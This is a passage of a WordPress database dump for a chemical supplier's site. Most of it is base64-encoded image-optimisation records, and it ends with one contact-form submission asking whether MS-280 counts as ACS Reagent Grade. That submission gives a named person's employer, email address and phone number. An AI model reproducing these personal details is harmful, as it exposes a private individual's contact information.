aWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4MTIsImlkIjoxNDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDgxNSwiaWQiOjE0MTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODE3LCJpZCI6MTQxOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4MjAsImlkIjoxNDE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNzgsInRpbWUiOjE0ODM1NzA4MjMsImlkIjoxNDE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMDEsInRpbWUiOjE0ODM1NzA4MjUsImlkIjoxNDE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo5NSwidGltZSI6MTQ4MzU3MDgyOCwiaWQiOjE0MTh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4MzEsImlkIjoxNDE4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODMzLCJpZCI6MTQxOH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NS12ZXJ0cmVsLXNtdC1zb2x2ZW50LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1LXZlcnRyZWwtc210LXNvbHZlbnQtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTUtdmVydHJlbC1zbXQtc29sdmVudC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDgzNiwiaWQiOjE0MTh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29498, 1417, 'wpfc_optimisation_reduction', '2137888'); 
INSERT INTO `wp_postmeta` VALUES (29499, 1417, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQuanBnIiwicmVkdWN0aW9uIjoyMTM3NTM1LCJ0aW1lIjoxNDgzNTcwODQ3LCJpZCI6IjE0MTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDg0OSwiaWQiOjE0MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODUyLCJpZCI6MTQxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4NTUsImlkIjoxNDE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODU5LCJpZCI6MTQxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4NjIsImlkIjoxNDE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDg2NCwiaWQiOjE0MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODY3LCJpZCI6MTQxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4NjksImlkIjoxNDE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxNjYsInRpbWUiOjE0ODM1NzA4NzIsImlkIjoxNDE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxMDEsInRpbWUiOjE0ODM1NzA4NzUsImlkIjoxNDE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3NSwidGltZSI6MTQ4MzU3MDg3NywiaWQiOjE0MTd9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03NTVsLXNvbHZlbnQtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA4ODAsImlkIjoxNDE3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzU1bC1zb2x2ZW50LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwODgyLCJpZCI6MTQxN30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTc1NWwtc29sdmVudC00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDg4NSwiaWQiOjE0MTd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29500, 3394, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (29501, 3394, '_seq_num', '189'); 
INSERT INTO `wp_postmeta` VALUES (29502, 3394, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (29503, 3394, '_field_12', 'Rafael Montalvo'); 
INSERT INTO `wp_postmeta` VALUES (29504, 3394, '_field_13', 'Teledyne Reynolds'); 
INSERT INTO `wp_postmeta` VALUES (29505, 3394, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (29506, 3394, '_field_14', 'rafael.montalvo@teledyne.com'); 
INSERT INTO `wp_postmeta` VALUES (29507, 3394, '_field_15', '(310) 574-2085'); 
INSERT INTO `wp_postmeta` VALUES (29508, 3394, '_field_16', 'We use MS-280 throughout our facility.  We are starting a program for one of our customers which require we use at least ACS Reagent Grade.  I&#039;d like to know if MS-280 could be considered ASC Reagent Grade.  Electronic Grade would be acceptable if it equals ACS Ragent grade plus requirements on trace metals.'); 
INSERT INTO `wp_postmeta` VALUES (29509, 3394, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (29510, 3394, '_sub_id', '3394'); 
INSERT INTO `wp_postmeta` VALUES (29511, 1416, 'wpfc_optimisation_reduction', '2162930'); 
